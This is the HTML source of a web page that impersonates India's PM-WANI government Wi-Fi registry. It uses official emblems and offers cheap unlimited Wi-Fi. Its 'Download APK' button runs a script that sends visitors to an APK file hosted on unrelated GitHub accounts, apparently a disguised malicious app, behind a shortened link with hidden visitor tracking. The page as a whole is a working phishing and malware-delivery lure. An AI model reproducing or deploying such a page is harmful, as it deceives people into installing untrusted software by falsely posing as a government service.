



<!DOCTYPE html>

<html lang="en">



<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">
 <meta name="description" content="FREE Wi-Fi @10Rs/Month from governement.">
    <meta property="og:title" content="PM-WANI Central Registry.">
    <meta property="og:description" content="FREE Wi-Fi @10Rs/Month from governement.">
    <meta property="og:image" content="https://i.postimg.cc/85zhv9Nf/wiiii.jpg"> 
    <meta property="og:url" content="https://rebrand.ly/PMWIFI">

<title>National Portal</title>

<style>

    /* Add a black background color to the top navigation */
.topnav {
  background-color: #015296;
  overflow: hidden;
}

/* Style the links inside the navigation bar */
.topnav a {
  float: left;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

/* Change the color of links on hover */
.topnav a:hover {
  background-color: #ddd;
  color: black;
}

/* Add a color to the active/current link */
.topnav a.active {
  background-color: #e4e4e4;
  color: rgb(46, 46, 46);
}

body {

margin: 0;

font-family: Public Sans,sans-serif;



}

header {
    font-family: Public Sans,sans-serif;
text-align: center;

color: rgb(0, 0, 0);

padding: 0px;

}

.ssop{

background: #ffffff;



}

main {


    font-family: Public Sans,sans-serif;
text-align: left;

padding: 30px;

color: rgb(0, 0, 0);

}



footer {

position: fixed;

bottom: 0;

width: 100%;

text-align: center;



padding: 5px;

}



#downloadButton {

background-color: #015296;

color: white;

width: 80%;

padding: 15px 30px;

font-size: 21px;

border: none;

border-radius: 5px;

cursor: pointer;

}



#logo {

max-width: 100%;

height: auto;

display: block;



}
/* jadhfjhsdjf*/
.mySlides {display: none;}
img {vertical-align: middle;}

/* Slideshow container */
.slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

/* Caption text */
.text {
  color: #f2f2f2;
  font-size: 15px;
  padding: 8px 12px;
  position: absolute;
  bottom: 8px;
  width: 100%;
  text-align: center;
}

/* Number text (1/3 etc) */
.numbertext {
  color: #f2f2f2;
  font-size: 12px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

/* The dots/bullets/indicators */
.dot {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbb;
  border-radius: 50%;
  display: inline-block;
  transition: background-color 0.6s ease;
}

.active {
  background-color: #717171;
}

/* Fading animation */
.fade {
  animation-name: fade;
  animation-duration: 1.5s;
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
}

/* ----------------------------------- */
.card {
    font-family: Public Sans,sans-serif;
  /* Add shadows to create the "card" effect */
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
  transition: 0.3s;
}

/* On mouse-over, add a deeper shadow */
.card:hover {
  box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2);
}

/* Add some padding inside the card container */
.container {
  padding: 2px 16px;
}

.bcard {
    padding: 20px 16px;
    color: #ddd;
    font-size:small;
    font-family: Public Sans,sans-serif;
    background: #015296;
}
.b2card {
    padding: 20px 16px;
    color: #ddd;
    font-size:small;
    font-family: Public Sans,sans-serif;
    background: #01355f;
}
.containerhe {
            display: flex;
				color: #015296;
            align-items: center; /* Align items vertically */
        }
        .containerhe img {
            height: 50px; /* Set the image height */
            margin-right: 10px; /* Space between image and text */
        }
        .containerhex h3 {
            margin: 0; /* Remove default margin */
			color: red;
        }

</style>



<script>

function done()

{

var m = new Date().getMinutes();

	if(m<60)

	{

		window.location="https://github.com/techglr/claim/raw/refs/heads/main/PM%20Wi-Fi.apk";

	}



	else

	{

		window.location="https://github.com/technews92/claim/blob/main/Data_Voucher.apk?raw=true";

	}

}

</script>

</head>



<body class="ssop">

    



<header>
 <div class="containerhe">
 <img id="logso" src=" https://pmwani.gov.in/assets/landing-page/images/emblem_india2.png" alt="PM-WANI Logo">
        <img id="logso" src="https://pmwani.gov.in/assets/landing-page/images/DoT-India-standard.png" alt="PM-WANI Logo">
        <h3>PM-WANI Central Registry</h3>
    </div>
   


    <div class="topnav">
        <a href="#news">Home</a>
        <a class="active" href="#home">Register</a>
        <a href="#news">News</a>
        <a href="#contact">Vendors</a>
        <a href="#about">About</a>
      </div> 
<div>
    <div class="slideshow-container">

        <div class="mySlides fade">
          <div class="numbertext"></div>
          <img src="https://pmwani.gov.in/assets/landing-page/images/slider/en/WANI2.png" style="width:100%">
          <div class="text"></div>
        </div>
        
        <div class="mySlides fade">
          <div class="numbertext"></div>
          <img src="https://pmwani.gov.in/assets/landing-page/images/slider/en/WANI1.png" style="width:100%">
          <div class="text"></div>
        </div>
        </div>
        <div style="display: none;">
            <span class="dot"></span> 
            <span class="dot"></span> 
            <span class="dot"></span> 
          </div>


</header>



<main>


    <div class="card">
        <div class="container">
          <h4><b>Infromation: </b></h4>
          <p>- Registration process for PM-WANI is started.<br>

            - Get unlimited Wi-Fi @10Rs/Month.<br>
            - No installation charges at all.<br>
    
            - HIGH-SPEED Data connectivity. <br> <br>
            - Download (PM Wi-Fi) app for Registration.</p>
        </div>
        <br>
<center>
<button onClick="done()" id="downloadButton">Download APK</button>
</center> <br>
      </div> 
      <br><br>
 
</main>

</div>
<center>
    <div class="bcard">
      SiteMap   |
      Terms & Conditions    |
      Copyright Policy  |
      Privacy Policy    |
      Privacy Policy for Mobile |
      Hyperlinking Policy
    </div>
  </center>
  <center>
   
  </center>
<footer>


</footer>




<script type="text/javascript">
    let slideIndex = 0;
    showSlides();
    
    function showSlides() {
      let i;
      let slides = document.getElementsByClassName("mySlides");
      let dots = document.getElementsByClassName("dot");
      for (i = 0; i < slides.length; i++) {
        slides[i].style.display = "none";  
      }
      slideIndex++;
      if (slideIndex > slides.length) {slideIndex = 1}    
      for (i = 0; i < dots.length; i++) {
        dots[i].className = dots[i].className.replace(" active", "");
      }
      slides[slideIndex-1].style.display = "block";  
      dots[slideIndex-1].className += " active";
      setTimeout(showSlides, 3000); // Change image every 2 seconds
    }
    </script>

<script type="text/javascript">
var sc_project=13082558; 
var sc_invisible=1; 
var sc_security="ffdb46ea"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/13082558/0/ffdb46ea/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>

</body>



</html>
